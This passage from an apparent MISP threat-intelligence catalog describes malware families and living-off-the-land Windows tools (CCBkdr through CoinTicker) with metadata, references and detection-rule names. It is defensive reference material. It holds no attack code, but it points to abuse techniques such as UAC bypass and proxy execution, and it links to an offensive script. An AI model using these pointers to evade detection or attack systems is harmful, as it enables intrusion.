To see the related clusters, click here.
CCBkdr
CCBkdr is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. [Talos CCleanup 2017] [Intezer Aurora Sept 2017]
Internal MISP references
UUID 4eb0720c-7046-4ff1-adfd-ae603506e499
which can be used as unique global reference for CCBkdr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0222 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
type | ['malware'] |
ccf32
ccf32 is data collection malware that has been used since at least February 2019, most notably during the FunnyDream campaign; there is also a similar x64 version.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID e00c2a0c-bbe5-4eff-b0ad-b2543456a317
which can be used as unique global reference for ccf32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1043 |
source | MITRE |
type | ['malware'] |
Cdb
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Resources: * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda * https://mrd0x.com/the-power-of-cdb-debugging-tool/ * https://twitter.com/nas_bench/status/1534957360032120833
Detection: * Sigma: proc_creation_win_lolbin_cdb.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Cdb.exe - LOLBAS Project]
Internal MISP references
UUID d9ea2696-7c47-44cd-8784-9aeef5e149ea
which can be used as unique global reference for Cdb
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5208 |
source | Tidal Cyber |
tags | ['4479b9e9-d912-451a-9ad5-08b3d922422d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CertOC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing certificates
Author: Ensar Samil
Paths: * c:\windows\system32\certoc.exe * c:\windows\syswow64\certoc.exe
Resources: * https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 * https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
Detection: * Sigma: proc_creation_win_certoc_load_dll.yml * IOC: Process creation with given parameter * IOC: Unsigned DLL load via certoc.exe * IOC: Network connection via certoc.exe[CertOC.exe - LOLBAS Project]
Internal MISP references
UUID 34e1c197-ac43-4634-9a0d-9148c748f774
which can be used as unique global reference for CertOC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5087 |
source | Tidal Cyber |
tags | ['fb909648-ee44-4871-abe6-82c909c4d677', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CertReq
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for requesting and managing certificates
Author: David Middlehurst
Paths: * C:\Windows\System32\certreq.exe * C:\Windows\SysWOW64\certreq.exe
Resources: * https://dtm.uk/certreq
Detection: * Sigma: proc_creation_win_lolbin_susp_certreq_download.yml * IOC: certreq creates new files * IOC: certreq makes POST requests[CertReq.exe - LOLBAS Project]
Internal MISP references
UUID 43050f80-ce28-49e3-aac6-cb3f4a07f4b4
which can be used as unique global reference for CertReq
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5088 |
source | Tidal Cyber |
tags | ['35a798a2-eaab-48a3-9ee7-5538f36a4172', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
certutil
certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [TechNet Certutil]
Internal MISP references
UUID 2fe21578-ee31-4ee8-b6ab-b5f76f97d043
which can be used as unique global reference for certutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0160 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '412da5b4-fb41-40fc-a29a-78dc9119aa75', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chaes
Chaes is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. Chaes was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.[Cybereason Chaes Nov 2020]
Internal MISP references
UUID 0c8efcd0-bfdf-4771-8754-18aac836c359
which can be used as unique global reference for Chaes
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0631 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Chaos
Chaos is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. [Chaos Stolen Backdoor]
Internal MISP references
UUID 92c88765-6b12-42cd-b1d7-f6a65b2236e2
which can be used as unique global reference for Chaos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0220 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
CharmPower
CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[Check Point APT35 CharmPower January 2022]
Internal MISP references
UUID b1e3b56f-2e83-4cab-a1c1-16999009d056
which can be used as unique global reference for CharmPower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0674 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ChChes
ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [Palo Alto menuPass Feb 2017] [JPCERT ChChes Feb 2017] [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID 3f2283ef-67c2-49a3-98ac-1aa9f0499361
which can be used as unique global reference for ChChes
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0144 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cheerscrypt
Cheerscrypt is a ransomware that was developed by Cinnamon Tempest and has been used in attacks against ESXi and Windows environments since at least 2022. Cheerscrypt was derived from the leaked Babuk source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from Babuk.[Sygnia Emperor Dragonfly October 2022][Trend Micro Cheerscrypt May 2022]
Internal MISP references
UUID 6475bc8c-b95d-5cb3-92f0-aa7e2f18859a
which can be used as unique global reference for Cheerscrypt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1096 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cherry Picker
Cherry Picker is a point of sale (PoS) memory scraper. [Trustwave Cherry Picker]
Internal MISP references
UUID 2fd6f564-918e-4ee7-920a-2b4be858d11a
which can be used as unique global reference for Cherry Picker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0107 |
source | MITRE |
type | ['malware'] |
China Chopper
China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.[Lee 2013] It has been used by several threat groups.[Dell TG-3390][FireEye Periscope March 2018][CISA AA21-200A APT40 July 2021][Rapid7 HAFNIUM Mar 2021]
Internal MISP references
UUID 723c5ab7-23ca-46f2-83bb-f1d1e550122c
which can be used as unique global reference for China Chopper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0020 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chinoxy
Chinoxy is a backdoor that has been used since at least November 2018, during the FunnyDream campaign, to gain persistence and drop additional payloads. According to security researchers, Chinoxy has been used by Chinese-speaking threat actors.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID 7c36563a-9143-4766-8aef-4e1787e18d8c
which can be used as unique global reference for Chinoxy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1041 |
source | MITRE |
type | ['malware'] |
Chisel
Chisel is an open source tool that can be used for networking tunneling.[U.S. CISA AvosLocker October 11 2023] According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".[GitHub Chisel] Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.[U.S. CISA AvosLocker October 11 2023][CISA AA20-259A Iran-Based Actor September 2020]
Internal MISP references
UUID bd2b2375-4f16-42b2-a862-959b5b41c2af
which can be used as unique global reference for Chisel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5063 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chocolatey
Chocolatey is a command-line package manager for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7a2b00ef-8a37-4901-bf0c-17da0ebf3d69
which can be used as unique global reference for Chocolatey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5028 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
CHOPSTICK
CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [FireEye APT28] [ESET Sednit Part 2] [FireEye APT28 January 2017] [DOJ GRU Indictment Jul 2018] It is tracked separately from the X-Agent for Android.
Internal MISP references
UUID 01c6c49a-f7c8-44cd-a377-4dfd358ffeba
which can be used as unique global reference for CHOPSTICK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0023 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chrommme
Chrommme is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with Gelsemium malware.[ESET Gelsemium June 2021]
Internal MISP references
UUID df77ed2a-f135-4f00-9a5e-79b7a6a2ed14
which can be used as unique global reference for Chrommme
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0667 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Clambling
Clambling is a modular backdoor written in C++ that has been used by Threat Group-3390 since at least 2017.[Trend Micro DRBControl February 2020]
Internal MISP references
UUID 4bac93bd-7e58-4ddb-a205-d99597b9e65e
which can be used as unique global reference for Clambling
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0660 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CL_Invocation
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Aero diagnostics script
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
Resources:
Detection: * Sigma: proc_creation_win_lolbin_cl_invocation.yml * Sigma: posh_ps_cl_invocation_lolscript.yml[CL_Invocation.ps1 - LOLBAS Project]
Internal MISP references
UUID 4bc36e22-6529-4a4a-a5d2-461f3925c5f3
which can be used as unique global reference for CL_Invocation
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5257 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CL_LoadAssembly
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Resources: * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Detection: * Sigma: proc_creation_win_lolbas_cl_loadassembly.yml[CL_LoadAssembly.ps1 - LOLBAS Project]
Internal MISP references
UUID cb950179-334d-4bd9-9cfb-87b09d279a3b
which can be used as unique global reference for CL_LoadAssembly
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5255 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CL_Mutexverifiers
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with CL_Mutexverifiers.ps1
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
Resources: * https://twitter.com/pabraeken/status/995111125447577600
Detection: * Sigma: proc_creation_win_lolbin_cl_mutexverifiers.yml[CL_Mutexverifiers.ps1 - LOLBAS Project]
Internal MISP references
UUID 3c63792a-1184-416e-aa9b-18da72e88327
which can be used as unique global reference for CL_Mutexverifiers
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5256 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Clop
Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[Mcafee Clop Aug 2019][Cybereason Clop Dec 2020][Unit42 Clop April 2021]
Internal MISP references
UUID 5321aa75-924c-47ae-b97a-b36f023abf2a
which can be used as unique global reference for Clop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0611 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', '562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b15c16f7-b8c7-4962-9acc-a98a39f87b69', 'b18b5401-d88d-4f28-8f50-a884a5e58349', 'ac862a66-a4ec-4285-9a21-b63576a5867d', '5ab5f811-5c7e-4f77-ae90-59d3beb93346', '1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0', 'e401022a-36ac-486d-8503-dd531410a927', '8a77c410-bed9-4376-87bf-5ac84fbc2c9d', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CloudChat Infostealer
CloudChat Infostealer is an information-stealing malware designed to harvest passwords, cookies, and other sensitive information from macOS systems.[Kandji 4 8 2024]
Internal MISP references
UUID 7a57e81b-2453-4aaf-94ad-c007bd7105a2
which can be used as unique global reference for CloudChat Infostealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5316 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
CloudDuke
CloudDuke is malware that was used by APT29 in 2015. [F-Secure The Dukes] [Securelist Minidionis July 2015]
Internal MISP references
UUID b3dd424b-ee96-449c-aa52-abbc7d4dfb86
which can be used as unique global reference for CloudDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0054 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
cmd
cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [TechNet Cmd]
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir
[TechNet Dir]), deleting files (e.g., del
[TechNet Del]), and copying files (e.g., copy
[TechNet Copy]).
Internal MISP references
UUID 98d89476-63ec-4baf-b2b3-86c52170f5d8
which can be used as unique global reference for cmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0106 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'a968c9f3-c190-488f-bacc-92e8f1ce295c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cmdkey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmdkey.exe * C:\Windows\SysWOW64\cmdkey.exe
Resources: * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Detection: * Sigma: proc_creation_win_cmdkey_recon.yml[Cmdkey.exe - LOLBAS Project]
Internal MISP references
UUID da252f67-2d4e-419f-b493-d4a1d024a01c
which can be used as unique global reference for Cmdkey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5089 |
source | Tidal Cyber |
tags | ['96bff827-e51f-47de-bde6-d2eec0f99767', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
cmdl32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Connection Manager Auto-Download
Author: Elliot Killick
Paths: * C:\Windows\System32\cmdl32.exe * C:\Windows\SysWOW64\cmdl32.exe
Resources: * https://github.com/LOLBAS-Project/LOLBAS/pull/151 * https://twitter.com/ElliotKillick/status/1455897435063074824 * https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/
Detection: * Sigma: proc_creation_win_lolbin_cmdl32.yml * IOC: Reports of downloading from suspicious URLs in %TMP%\config.log * IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[cmdl32.exe - LOLBAS Project]
Internal MISP references
UUID 44a523a8-9ed6-4f01-9a53-0e8ea1e15b51
which can be used as unique global reference for cmdl32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5090 |
source | Tidal Cyber |
tags | ['4c8f8830-0b2c-4c79-b1db-8659ede492f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Cmstp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Installs or removes a Connection Manager service profile.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmstp.exe * C:\Windows\SysWOW64\cmstp.exe
Resources: * https://twitter.com/NickTyrer/status/958450014111633408 * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Detection: * Sigma: proc_creation_win_cmstp_execution_by_creation.yml * Sigma: proc_creation_win_uac_bypass_cmstp.yml * Splunk: cmlua_or_cmstplua_uac_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: defense_evasion_unusual_process_network_connection.toml * IOC: Execution of cmstp.exe without a VPN use case is suspicious * IOC: DotNet CLR libraries loaded into cmstp.exe * IOC: DotNet CLR Usage Log - cmstp.exe.log[Cmstp.exe - LOLBAS Project]
Internal MISP references
UUID 6f848e15-5234-4445-9a05-2949e4c57f0b
which can be used as unique global reference for Cmstp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5091 |
source | Tidal Cyber |
tags | ['65938118-2f00-48a1-856e-d1a75a08e3c6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
COATHANGER
COATHANGER is a remote access tool (RAT) targeting FortiGate networking appliances. First used in 2023 in targeted intrusions against military and government entities in the Netherlands along with other victims, COATHANGER was disclosed in early 2024, with a high confidence assessment linking this malware to a state-sponsored entity in the People's Republic of China. COATHANGER is delivered after gaining access to a FortiGate device, with in-the-wild observations linked to exploitation of CVE-2022-42475. The name COATHANGER is based on a unique string in the malware used to encrypt configuration files on disk: “She took his coat and hung it up”
.[NCSC-NL COATHANGER Feb 2024]
Internal MISP references
UUID fbd3f71a-e123-5527-908c-9e7ea0d646e8
which can be used as unique global reference for COATHANGER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1105 |
source | MITRE |
type | ['malware'] |
Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[cobaltstrike manual]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[cobaltstrike manual]
Internal MISP references
UUID 9b6bcbba-3ab4-4a4c-a233-cd12254823f6
which can be used as unique global reference for Cobalt Strike
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0154 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '56d89c06-23a0-4642-adfc-1fffd3524191', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobalt Strike Random C2 Profile Generator
This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.[GitHub random_c2_profile] According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.[CERTFR-2023-CTI-007]
Internal MISP references
UUID cf47b3ce-1392-4904-a4e6-f65aebebddc6
which can be used as unique global reference for Cobalt Strike Random C2 Profile Generator
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5057 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobian RAT
Cobian RAT is a backdoor, remote access tool that has been observed since 2016.[Zscaler Cobian Aug 2017]
Internal MISP references
UUID d4e6f9f7-7f4d-47c2-be24-b267d9317303
which can be used as unique global reference for Cobian RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0338 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
code
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSCode binary, also portable (CLI) version
Author: PfiatDe
Paths: * %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe * C:\Program Files\Microsoft VS Code\Code.exe * C:\Program Files (x86)\Microsoft VS Code\Code.exe
Resources: * https://badoption.eu/blog/2023/01/31/code_c2.html * https://code.visualstudio.com/docs/remote/tunnels * https://code.visualstudio.com/blogs/2022/12/07/remote-even-better
Detection: * IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com * IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe * IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%.vscode-cli\code_tunnel.json[code.exe - LOLBAS Project]
Internal MISP references
UUID 49d440e4-b2ea-4e7d-8ded-8589ddf679d9
which can be used as unique global reference for code
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5185 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CoinTicker
CoinTicker is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.[CoinTicker 2019]
Internal MISP references
UUID b0d9b31a-072b-4744-8d2f-3a63256a932f
which can be used as unique global reference for CoinTicker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0369 |
source | MITRE |
type | ['malware'] |
Colorcpl
